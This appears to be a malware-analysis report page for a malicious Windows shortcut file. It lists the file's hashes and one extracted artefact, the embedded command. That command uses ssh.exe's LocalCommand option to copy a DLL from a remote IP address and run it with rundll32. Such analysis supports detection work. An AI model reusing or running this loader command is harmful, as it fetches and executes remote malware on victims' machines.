Malicious
Malicious

16d624196abdd850fe4b92894970605c

LNK File
|
MD5: 16d624196abdd850fe4b92894970605c
|
Size: 1.86 KB
|
application/x-ms-shortcut


Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
16d624196abdd850fe4b92894970605c
Sha1
8a0366ae8a374a3c2571078124ce6f36d2d4da09
Sha256
9714272c145f2756b257ebe574a7d84f1ae476897ed42cae28d31ee4f4354dae
Sha384
a92a60a799db08c13522a768da26b8f3eab539388bfec3cea9f8289eeba943b88080a46438548d6e2a4bf116d1f268b1
Sha512
ded3f419eb181c006cfe0588bafaceaba3c9705393026264ed5191ede6e2bfae1945987ba5756e6a1ec5223ba9811e56f7c7d8c05964b0a3bab9ddb250230b6f
SSDeep
48:8tmXZDbbWG9/GzWyvHnLWIIlgwV5WSo5UBWW7/G7:8U9h9eBfniP5W9UBWAe
TLSH
4931310677E91329D2B38E7984BBD2108929BC02EC525F3D0584079C1860719FD36F3F
File Structure
Artefacts
Name
Value
LNK: Command Execution

ssh.exe -o "PermitLocalCommand=yes" -o "StrictHostKeyChecking=no" -o "LocalCommand=scp helpdesk@18.227.111.207:/tmp/msvcrp.dll c:\users\public\. && rundll32.exe c:\users\public\msvcrp.dll,patch" helpdesk@18.227.111.207

16d624196abdd850fe4b92894970605c (1.86 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙